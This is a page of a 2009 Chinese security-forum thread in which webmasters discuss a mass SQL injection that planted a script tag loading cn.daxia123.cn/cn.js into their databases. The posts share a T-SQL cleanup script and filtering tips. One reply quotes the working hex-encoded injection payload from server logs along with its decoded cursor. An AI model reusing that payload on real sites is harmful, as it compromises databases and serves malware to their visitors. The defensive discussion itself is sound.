求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 入侵防御（HIPS）求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十五次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

«2 3 4 5 6 789

8 / 9 页

跳转页

求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

淘气学子初生襁褓狮帖子:4 注册: 2009-01-08 来自:	发表于： 2009-01-09 14:20 \| 短消息资料字号：小中大 71楼回复 1F allenxing 的帖子用DW把该代码批量删除,这是非法的恶意链接.
淘气学子初生襁褓狮帖子:4 注册: 2009-01-08 来自:

低级网管初生襁褓狮帖子:3 注册: 2009-01-09 来自:	发表于： 2009-01-09 14:40 \| 短消息资料字号：小中大 72楼回复 71F 淘气学子的帖子这个不是在代码中的，是直接写入数据库的
低级网管初生襁褓狮帖子:3 注册: 2009-01-09 来自:

水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:	发表于： 2009-01-09 17:56 \| 短消息资料字号：小中大 73楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击 /*********定义要去除的字符,请注意,可能不止一条,我的服务器就查到两条********/ declare @delStr nvarchar(500) set @delStr='<script src=http://cn.daxia123.cn/cn.js></script>' --set @delStr='<script src=http://cn.jxmmtv.com/cn.js></script>' /************************************/ /******以下为操作实体********/ set nocount on declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int declare @sql nvarchar(500) set @iResult=0 declare cur cursor for select name,id from sysobjects where xtype='U' open cur fetch next from cur into @tableName,@tbID while @@fetch_status=0 begin declare cur1 cursor for --xtype in (231,167,239,175,99,35) 为char,varchar,nchar,nvarchar,ntext,text类型 select name from syscolumns where xtype in (231,167,239,175,99,35) and id=@tbID open cur1 fetch next from cur1 into @columnName while @@fetch_status=0 begin set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(convert(nvarchar(4000),['+@columnName+']),'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%''' exec sp_executesql @sql set @iRow=@@rowcount set @iResult=@iResult+@iRow if @iRow>0 begin print '表：'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;' end fetch next from cur1 into @columnName end close cur1 deallocate cur1 fetch next from cur into @tableName,@tbID end print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!' close cur deallocate cur set nocount off /*以上为操作实体****/
水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:

水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:	发表于： 2009-01-09 17:59 \| 短消息资料字号：小中大 74楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击这个东西是asp页面攻击，从log记录看到这个东西 QUERY_STRING:matchid=155;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- 中间这二进制转换了就是： DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype in (99,35,231,167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN print ('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:

水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:	发表于： 2009-01-09 18:06 \| 短消息资料字号：小中大 75楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击解决办法，在asp页面里加入防注入代码就行，攻击者是利用软件提交url的，从http头可以看出： ALL_HTTP:HTTP_HOST:finance.jmcatv.com.cn HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) HTTP_COOKIE:ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK HTTP_CACHE_CONTROL:no-cache ALL_RAW:Host: finance.jmcatv.com.cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Cookie: ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK Cache-Control: no-cache 返回警告语句没用，最好是重定向到其它页面：如叫他下载个软件，呵呵，要大文件下载，如警告无效后，将它列入黑名单，再访问时，就叫它下载： If IsBlackIP(GetCIP) Then '//黑名单访问，送它一免费杀毒软件，以示警告！呵呵呵，毒！ response.redirect "http://download.rising.com.cn/Middle/RavolSKY.exe" End If
水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:

水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:	发表于： 2009-01-09 18:11 \| 短消息资料字号：小中大 76楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击对于被黑的网站，如大量asp页面，需要进行asp安全性检测和进行批处理加入防注入的，或对所有静态动态页面进行批量清除无用代码非法代码的，可用delphi设计入简单的程序处理。如果不会，我做了个，可以留下你的email，我将程序和代码发给你。
水上飞云初生襁褓狮帖子:7 注册: 2008-12-28 来自:

YMStudio 初生襁褓狮帖子:1 注册: 2009-01-09 来自:	发表于： 2009-01-09 19:56 \| 短消息资料字号：小中大 77楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击今天下午发现的，俺现在还在加班弄这个破数据库……强烈谴责这一无聊无耻的行径！！俺就那几个特殊页面没加过滤，他就TMD找到了，我哭了~~~~以后EXEC是肯定要过滤的！！不管了~~气愤中…… YMStudio 最后编辑于 2009-01-09 19:57:22
YMStudio 初生襁褓狮帖子:1 注册: 2009-01-09 来自:

岩盐115 初生襁褓狮帖子:3 注册: 2009-01-10 来自:	发表于： 2009-01-10 13:26 \| 短消息资料字号：小中大 78楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击我也深受其害，好在我有自己的服务器，可以安装urlscan，设置url长度，暂时还凑效，一天来好几个攻击都被挡住了，看了一下ip地址，韩国的居多，还有美国、卡塔尔和国内等
岩盐115 初生襁褓狮帖子:3 注册: 2009-01-10 来自:

不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:	发表于： 2009-01-10 14:28 \| 短消息资料字号：小中大 79楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击楼上，能不能详细说一下？
不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:

不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:	发表于： 2009-01-10 14:37 \| 短消息资料字号：小中大 80楼回复：求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击楼上，能不能具体说一下urlscan怎么配置
不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:

<<上一主题|下一主题>>

«2 3 4 5 6 789

8 / 9 页

跳转页

页面顶部

Powered by Discuz!NT